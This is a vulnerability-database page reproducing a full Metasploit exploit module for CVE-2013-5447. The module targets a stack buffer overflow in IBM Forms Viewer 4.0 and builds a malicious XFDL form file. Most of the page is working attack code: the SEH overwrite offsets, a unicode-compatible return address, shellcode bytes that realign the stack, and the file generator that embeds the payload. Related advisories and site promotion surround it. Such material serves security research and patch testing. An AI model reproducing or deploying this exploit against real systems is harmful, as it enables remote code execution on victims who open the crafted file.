Vulners
Lucene search
IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | IBM Forms Viewer Unicode Buffer Overflow | 4 Jan 201400:00 | – | zdt |
 | Security Bulletin: IBM Forms Viewer stack buffer overflow identified (CVE-2013-5447) | 25 Sep 202223:09 | – | ibm |
 | CVE-2013-5447 | 7 Jan 201400:00 | – | circl |
 | IBM Forms Viewer XFDL Form Processing Stack Buffer Overflow (CVE-2013-5447) | 17 Feb 201400:00 | – | checkpoint_advisories |
| IBM Forms Viewer XFDL Form Processing Stack Buffer Overflow - Ver2 (CVE-2013-5447) | 31 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2013-5447 | 10 Dec 201302:00 | – | cve |
 | CVE-2013-5447 | 10 Dec 201302:00 | – | cvelist |
 | IBM Forms Viewer Stack Buffer Overflow | 19 Jan 201400:00 | – | nessus |
 | IBM Forms Viewer Unicode Buffer Overflow | 27 Dec 201316:20 | – | metasploit |
 | CVE-2013-5447 | 10 Dec 201306:14 | – | nvd |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include REXML
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Forms Viewer Unicode Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
XFDL files, with a long fontname value. This module has been tested successfully on IBM
Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez', # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-5447' ],
[ 'OSVDB', '100732' ],
[ 'ZDI', '13-274' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
],
'Payload' =>
{
'Space' => 3000,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
'BufferOffset' => 10
},
'BadChars' => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
'DisableNops' => true,
# Fix the stack before the payload is executed, so we avoid
# windows exceptions due to alignment
'Prepend' =>
"\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
},
'Platform' => 'win',
'Targets' =>
[
[ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
# masqform.exe 8.0.0.266
{
'Ret' => 0x4c30, # p/p/r unicode from masqform.exe
'Nop' => 0x47, # 004700 => add [edi+0x0],al
'Offset' => 62
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 05 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xfdl']),
], self.class)
end
def generate_xfdl
xml = Document.new
# XFDL
xfdl = xml.add_element("XFDL", {
'xmlns:custom' => "http://www.ibm.com/xmlns/prod/XFDL/Custom",
'xmlns:designer' => "http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6",
'xmlns:ev' => "http://www.w3.org/2001/xml-events",
'xmlns:xfdl' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
'xmlns:xforms' => "http://www.w3.org/2002/xforms",
'xmlns' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance"
})
# XFDL => globalpage
xdfl_global_page = xfdl.add_element("globalpage", {
"sid" => "global"
})
global = xdfl_global_page.add_element("global", {
"sid" => "global"
})
designer_date = global.add_element("designer:date")
designer_date.text = "20060615"
form_id = global.add_element("formid")
form_id.add_element("title")
serial_number = form_id.add_element("serialnumber")
serial_number.text = "A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000"
version_form = form_id.add_element("version")
version_form.text = "1"
# XFDL => page
page = xfdl.add_element("page", {
"sid" => "PAGE1"
})
# XFDL => page => global
page_global = page.add_element("global", {
"sid" => "global"
})
label_page = page_global.add_element("label")
label_page.text = "PAGE1"
# XFDL => page => label
label = page.add_element("label", {
"sid" => "title"
})
item_location = label.add_element("itemlocation")
x = item_location.add_element("x")
x.text = "20"
y = item_location.add_element("y")
y.text = "0"
value = label.add_element("value", {
"compute" => "global.global.custom:formTitle"
})
value.text = rand_text_alpha(10)
font_info = label.add_element("fontinfo")
font_name = font_info.add_element("fontname")
font_name.text = "MSF_REPLACE"
xml.to_s
end
def exploit
sploit = rand_text_alpha(target['Offset'])
sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
sploit << [target.ret].pack("v") # seh # ppr
sploit << [target['Nop']].pack("C")
sploit << payload.encoded
sploit << rand_text_alpha(4096) # make it crash
xfdl = generate_xfdl.gsub(/MSF_REPLACE/, sploit) # To avoid rexml html encoding
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(xfdl)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2014 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
EPSS0.68321